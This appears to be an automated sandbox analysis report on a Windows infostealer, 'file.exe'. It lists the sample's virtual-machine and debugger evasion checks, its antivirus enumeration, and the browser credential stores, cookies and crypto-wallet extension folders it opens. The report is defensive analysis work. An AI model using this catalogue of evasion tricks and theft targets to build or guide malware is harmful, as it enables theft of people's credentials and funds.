            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\file.exeCode function: 5_3_00C9BAF8 sldt word ptr [eax+005977B8h]5_3_00C9BAF8
            Source: C:\Users\user\Desktop\file.exe TID: 7972Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 8060Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: file.exe, file.exe, 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
            Source: file.exe, 00000005.00000002.1522481301.0000000000C4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
            Source: file.exe, 00000005.00000003.1356763459.00000000056B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696501413p
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
            Source: file.exe, 00000005.00000002.1522481301.0000000000C08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0E
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
            Source: file.exe, 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
            Source: file.exe, 00000005.00000003.1356763459.00000000056AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
            Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
            Source: C:\Users\user\Desktop\file.exeFile opened: SICE
            Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeCode function: 5_2_0030DF70 LdrInitializeThunk,5_2_0030DF70
            Source: file.exe, file.exe, 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: file.exe, 00000005.00000002.1525782429.0000000005691000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1453831859.000000000568C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1430570336.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1430618094.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1430635933.0000000000CBB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000005.00000003.1454299092.000000000568E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000005.00000003.1439188869.00000000056A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7616, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: file.exe, 00000005.00000002.1522481301.0000000000C4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
            Source: file.exe, 00000005.00000002.1522481301.0000000000C4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
            Source: file.exe, 00000005.00000003.1410050463.0000000000CAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Libertyo
            Source: file.exe, 00000005.00000002.1522481301.0000000000C4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: file.exe, 00000005.00000003.1380537952.000000000568C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
            Source: file.exe, 00000005.00000002.1522481301.0000000000C4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
            Source: file.exe, 00000005.00000003.1430537367.0000000000CA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: file.exe, 00000005.00000003.1409970850.0000000000CA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
